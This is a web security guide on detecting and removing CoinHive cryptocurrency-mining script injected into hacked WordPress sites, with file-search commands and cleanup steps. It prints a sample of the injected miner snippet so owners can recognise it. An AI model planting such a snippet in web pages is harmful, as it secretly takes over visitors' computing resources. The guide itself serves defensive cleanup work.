Back
Coinhive script clean up from hacked website

How to clean up CoinHive miner code from the hacked WordPress website?

We have noticed that a massive number of hacked WordPress websites are used for Monero cryptocurrency mining. Hackers use CoinHive – a Monero cryptocurrency mining program written in the JavaScript programming language. When embedded into your site, this program mines cryptocurrency by borrowing your website visitors’ computer resources. If you have noticed this, we recommend to perform steps outlined below and clear CoinHive mining code from your website.

Identify modified files

The first thing to do is to identify which files have been changed. You can do this in several ways:

  • Connect to the server (if it is possible). Use command “$ find ./ -type f -mtime -10”, where -10 means day interval.
  • Use the FileZilla program. First, choose Server -> Search remote files… In the window that opens, select search conditions -> date, after, and enter the date, e.g. 10 days earlier than today.
  • Refer to the hosting. If you can’t access your server, you can try to contact your hosting administrator and request a help.

If you do not find any modified files, it is possible that the CoinHive mining code is loaded into the database. In this case, you should look up for “CoinHive” keyword in your database table. If you have access to phpMyAdmin, use the Search tool or try to search using SQL LIKE request for connecting to the server.

View modified files

There should be CoinHive code in the modified files. If all the files look clean, then try searching for a “coinhive” keyword in all the website files. How to do this:

  • If you have access to the server, use the following command: grep -rnw '/' -e 'coinhive'
  • If you are not able to access the server, you can use a code editor such as Notepad ++. Select “Search text string in all files and folders” and start searching.

Clean up CoinHive code

Code example:

<script src='https://coinhive.com/lib/coinhive.min.js' type='text/javascript'></script>
<script>var miner = new CoinHive.Anonymous('TnKJQivLdI92CHM5VDumyS'); miner.start();</script>

Remember that this part of the CoinHive JavaScript miner code TnKJQivLdI92CHM5VDumyS is used to identify the user of the script and may vary.

Reduce the risk so that it does not happen again

Change your hosting, database and FTP passwords. Change passwords for all users, make sure all the passwords are strong. Renew WordPress and all plugins, make sure all plugins you use do not have security holes – use our database.

Similar Posts

Security threat caused by closed WordPress plugins

WordPress Plugins closed by WordPress.org security team still endangers thousands of websites

Plugins are the most common cause of WordPress website hacking. In February, we have found a security vulnerability in the Simple Contact ...

Coinhive script clean up from hacked website

How to clean up CoinHive miner code from the hacked WordPress website?

We have noticed that a massive number of hacked WordPress websites are used for Monero cryptocurrency mining. Hackers use CoinHive – a ...

Credit card data hack on WooCommerce

How can hackers steal credit card data from your WooCommerce store?

If you have credit card form on your WooCommerce Checkout page, it is time to worry. We have noticed that a large part of the Payment ...

Leave a Reply

Your email address will not be published. Required fields are marked *